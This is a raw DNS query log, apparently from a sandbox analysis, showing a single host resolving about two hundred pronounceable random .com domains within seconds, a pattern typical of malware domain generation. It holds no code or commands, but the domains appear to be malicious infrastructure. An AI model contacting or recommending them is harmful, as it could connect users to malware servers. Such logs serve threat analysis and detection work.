                                                                                                                                                                                                          Sep 8, 2024 10:54:12.519192934 CEST192.168.2.91.1.1.10x1ec1Standard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.520973921 CEST192.168.2.91.1.1.10x647fStandard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.521534920 CEST192.168.2.91.1.1.10x9c02Standard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.537045956 CEST192.168.2.91.1.1.10x832cStandard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.538825035 CEST192.168.2.91.1.1.10xc0c9Standard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.539073944 CEST192.168.2.91.1.1.10x1f25Standard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.539412022 CEST192.168.2.91.1.1.10x8d9eStandard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.539690018 CEST192.168.2.91.1.1.10xd40aStandard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.540364981 CEST192.168.2.91.1.1.10xffd6Standard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.540525913 CEST192.168.2.91.1.1.10x506cStandard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.541570902 CEST192.168.2.91.1.1.10xc6c0Standard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.541959047 CEST192.168.2.91.1.1.10x661dStandard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.542233944 CEST192.168.2.91.1.1.10xe5caStandard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.542469978 CEST192.168.2.91.1.1.10x12d0Standard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.545574903 CEST192.168.2.91.1.1.10xaba2Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.546386957 CEST192.168.2.91.1.1.10x7428Standard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.548620939 CEST192.168.2.91.1.1.10xaaeStandard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.548655987 CEST192.168.2.91.1.1.10xca4dStandard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.549860954 CEST192.168.2.91.1.1.10xa092Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.567796946 CEST192.168.2.91.1.1.10xc825Standard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.568227053 CEST192.168.2.91.1.1.10x352eStandard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.568578959 CEST192.168.2.91.1.1.10x8deeStandard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.568798065 CEST192.168.2.91.1.1.10x451cStandard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.569312096 CEST192.168.2.91.1.1.10x9372Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.569694042 CEST192.168.2.91.1.1.10x3bfaStandard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.569726944 CEST192.168.2.91.1.1.10x1185Standard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.569941044 CEST192.168.2.91.1.1.10x8ea3Standard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.570106030 CEST192.168.2.91.1.1.10x345dStandard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.570488930 CEST192.168.2.91.1.1.10x3d96Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.570583105 CEST192.168.2.91.1.1.10x5beStandard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.570691109 CEST192.168.2.91.1.1.10x578aStandard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.570750952 CEST192.168.2.91.1.1.10xaecdStandard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.570916891 CEST192.168.2.91.1.1.10xd462Standard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.570972919 CEST192.168.2.91.1.1.10x5447Standard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.871848106 CEST192.168.2.91.1.1.10x2697Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.873155117 CEST192.168.2.91.1.1.10xd71dStandard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.876198053 CEST192.168.2.91.1.1.10x5bcStandard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.879636049 CEST192.168.2.91.1.1.10xdcafStandard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.885898113 CEST192.168.2.91.1.1.10xa566Standard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.890212059 CEST192.168.2.91.1.1.10x407aStandard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.895580053 CEST192.168.2.91.1.1.10xe4aaStandard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.896243095 CEST192.168.2.91.1.1.10x753aStandard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.896445990 CEST192.168.2.91.1.1.10xddeStandard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.898518085 CEST192.168.2.91.1.1.10x8044Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.900335073 CEST192.168.2.91.1.1.10x7acStandard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.901132107 CEST192.168.2.91.1.1.10x91beStandard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.907136917 CEST192.168.2.91.1.1.10xf748Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.908003092 CEST192.168.2.91.1.1.10x5b65Standard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.908694983 CEST192.168.2.91.1.1.10x3e3aStandard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.909729004 CEST192.168.2.91.1.1.10xf759Standard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.909904957 CEST192.168.2.91.1.1.10x90e6Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.910223007 CEST192.168.2.91.1.1.10x768cStandard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:14.911792994 CEST192.168.2.91.1.1.10xfa44Standard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.017088890 CEST192.168.2.91.1.1.10xf9caStandard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.036258936 CEST192.168.2.91.1.1.10x53f5Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.037244081 CEST192.168.2.91.1.1.10xe777Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.037460089 CEST192.168.2.91.1.1.10xa6b7Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.038806915 CEST192.168.2.91.1.1.10x6313Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.040694952 CEST192.168.2.91.1.1.10xb0b3Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.041256905 CEST192.168.2.91.1.1.10x3dbcStandard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.042344093 CEST192.168.2.91.1.1.10x7156Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.042778969 CEST192.168.2.91.1.1.10xacdStandard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.043821096 CEST192.168.2.91.1.1.10xbb94Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.044025898 CEST192.168.2.91.1.1.10xb5f5Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.045912027 CEST192.168.2.91.1.1.10x178cStandard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052159071 CEST192.168.2.91.1.1.10x4d34Standard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052371025 CEST192.168.2.91.1.1.10x6637Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052580118 CEST192.168.2.91.1.1.10x78a2Standard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052751064 CEST192.168.2.91.1.1.10xd128Standard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.053719997 CEST192.168.2.91.1.1.10x3b0dStandard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.054284096 CEST192.168.2.91.1.1.10xf598Standard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.068876982 CEST192.168.2.91.1.1.10x5b56Standard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069070101 CEST192.168.2.91.1.1.10x4457Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069262028 CEST192.168.2.91.1.1.10x22daStandard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069400072 CEST192.168.2.91.1.1.10xdaStandard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069562912 CEST192.168.2.91.1.1.10xfb78Standard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069727898 CEST192.168.2.91.1.1.10x32c3Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070072889 CEST192.168.2.91.1.1.10xf97fStandard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070291996 CEST192.168.2.91.1.1.10x99bbStandard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070429087 CEST192.168.2.91.1.1.10x2401Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070619106 CEST192.168.2.91.1.1.10x591eStandard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.071643114 CEST192.168.2.91.1.1.10x5153Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.071804047 CEST192.168.2.91.1.1.10xb196Standard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.072004080 CEST192.168.2.91.1.1.10x69faStandard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.072221041 CEST192.168.2.91.1.1.10x9fb9Standard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.072242975 CEST192.168.2.91.1.1.10xb899Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.073992968 CEST192.168.2.91.1.1.10xae97Standard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079078913 CEST192.168.2.91.1.1.10x1bc3Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079243898 CEST192.168.2.91.1.1.10x8cbaStandard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079402924 CEST192.168.2.91.1.1.10x5f0Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080049038 CEST192.168.2.91.1.1.10xb5d9Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080230951 CEST192.168.2.91.1.1.10x7cecStandard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080405951 CEST192.168.2.91.1.1.10x4190Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080549955 CEST192.168.2.91.1.1.10x2560Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.135046959 CEST192.168.2.91.1.1.10xfaedStandard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.135236025 CEST192.168.2.91.1.1.10xdd36Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.135412931 CEST192.168.2.91.1.1.10x8067Standard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.136312962 CEST192.168.2.91.1.1.10x1903Standard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.965338945 CEST192.168.2.91.1.1.10x3b29Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.966331959 CEST192.168.2.91.1.1.10x118dStandard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.966898918 CEST192.168.2.91.1.1.10x7ad8Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.969425917 CEST192.168.2.91.1.1.10xaf56Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.969644070 CEST192.168.2.91.1.1.10xdd41Standard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.970660925 CEST192.168.2.91.1.1.10x985aStandard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.971765995 CEST192.168.2.91.1.1.10x805dStandard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.972218037 CEST192.168.2.91.1.1.10x6ee1Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.972635031 CEST192.168.2.91.1.1.10x9f39Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.972774029 CEST192.168.2.91.1.1.10xf37dStandard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.973210096 CEST192.168.2.91.1.1.10xf402Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.973578930 CEST192.168.2.91.1.1.10x7c11Standard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.973633051 CEST192.168.2.91.1.1.10xa86eStandard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.974359989 CEST192.168.2.91.1.1.10x98faStandard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.974360943 CEST192.168.2.91.1.1.10xc8beStandard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.974842072 CEST192.168.2.91.1.1.10x838Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.975255013 CEST192.168.2.91.1.1.10x3894Standard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.976052046 CEST192.168.2.91.1.1.10x5b01Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.976309061 CEST192.168.2.91.1.1.10x3437Standard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.976914883 CEST192.168.2.91.1.1.10x8fcbStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977085114 CEST192.168.2.91.1.1.10x5ddaStandard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977339029 CEST192.168.2.91.1.1.10xed61Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977801085 CEST192.168.2.91.1.1.10xbf0fStandard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977987051 CEST192.168.2.91.1.1.10xa1baStandard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.978353977 CEST192.168.2.91.1.1.10x664Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.978521109 CEST192.168.2.91.1.1.10xadddStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.978801012 CEST192.168.2.91.1.1.10xaf8Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.979181051 CEST192.168.2.91.1.1.10x1dcbStandard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.979803085 CEST192.168.2.91.1.1.10x620dStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.981178999 CEST192.168.2.91.1.1.10xd8f7Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.982916117 CEST192.168.2.91.1.1.10x758Standard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.983922005 CEST192.168.2.91.1.1.10x9e8aStandard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.984848022 CEST192.168.2.91.1.1.10x6781Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.985395908 CEST192.168.2.91.1.1.10xf179Standard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.986912012 CEST192.168.2.91.1.1.10x176eStandard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.987652063 CEST192.168.2.91.1.1.10x2c4dStandard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.988557100 CEST192.168.2.91.1.1.10xee55Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.989433050 CEST192.168.2.91.1.1.10xad6cStandard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.990006924 CEST192.168.2.91.1.1.10xd7ecStandard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.991187096 CEST192.168.2.91.1.1.10x3a3bStandard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.994168997 CEST192.168.2.91.1.1.10xa186Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.997823000 CEST192.168.2.91.1.1.10x67d1Standard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.998866081 CEST192.168.2.91.1.1.10xb272Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.000338078 CEST192.168.2.91.1.1.10x4700Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.001135111 CEST192.168.2.91.1.1.10xb1cStandard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.002291918 CEST192.168.2.91.1.1.10x2591Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.003737926 CEST192.168.2.91.1.1.10x3255Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.004354000 CEST192.168.2.91.1.1.10x963fStandard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.005032063 CEST192.168.2.91.1.1.10x28f9Standard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.006616116 CEST192.168.2.91.1.1.10x370bStandard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.007662058 CEST192.168.2.91.1.1.10x6744Standard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.008289099 CEST192.168.2.91.1.1.10xbafbStandard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.008933067 CEST192.168.2.91.1.1.10x734fStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.010377884 CEST192.168.2.91.1.1.10xffd6Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.011132002 CEST192.168.2.91.1.1.10x6bdbStandard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.012187004 CEST192.168.2.91.1.1.10x6b1bStandard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.012876987 CEST192.168.2.91.1.1.10xcbe8Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.013719082 CEST192.168.2.91.1.1.10x4274Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.014749050 CEST192.168.2.91.1.1.10x7b86Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.015338898 CEST192.168.2.91.1.1.10xb9dfStandard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.016204119 CEST192.168.2.91.1.1.10xcedeStandard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.016865015 CEST192.168.2.91.1.1.10x3126Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.666294098 CEST192.168.2.91.1.1.10xcafbStandard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.668104887 CEST192.168.2.91.1.1.10x29c7Standard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.675250053 CEST192.168.2.91.1.1.10xcceeStandard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.678524971 CEST192.168.2.91.1.1.10xed68Standard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.678956985 CEST192.168.2.91.1.1.10xddbaStandard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.680334091 CEST192.168.2.91.1.1.10x735aStandard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.681132078 CEST192.168.2.91.1.1.10x918aStandard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.681828976 CEST192.168.2.91.1.1.10x6470Standard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.682166100 CEST192.168.2.91.1.1.10xed9eStandard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.682676077 CEST192.168.2.91.1.1.10x9d19Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.683229923 CEST192.168.2.91.1.1.10xe0e3Standard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.683459997 CEST192.168.2.91.1.1.10x1772Standard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.683887005 CEST192.168.2.91.1.1.10x1caeStandard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.684241056 CEST192.168.2.91.1.1.10x1e8eStandard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.689703941 CEST192.168.2.91.1.1.10x1f9bStandard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.689951897 CEST192.168.2.91.1.1.10x3583Standard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.692675114 CEST192.168.2.91.1.1.10xc256Standard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.710500956 CEST192.168.2.91.1.1.10xe820Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.711047888 CEST192.168.2.91.1.1.10xcde1Standard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.711853027 CEST192.168.2.91.1.1.10xdb36Standard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.724333048 CEST192.168.2.91.1.1.10x3167Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
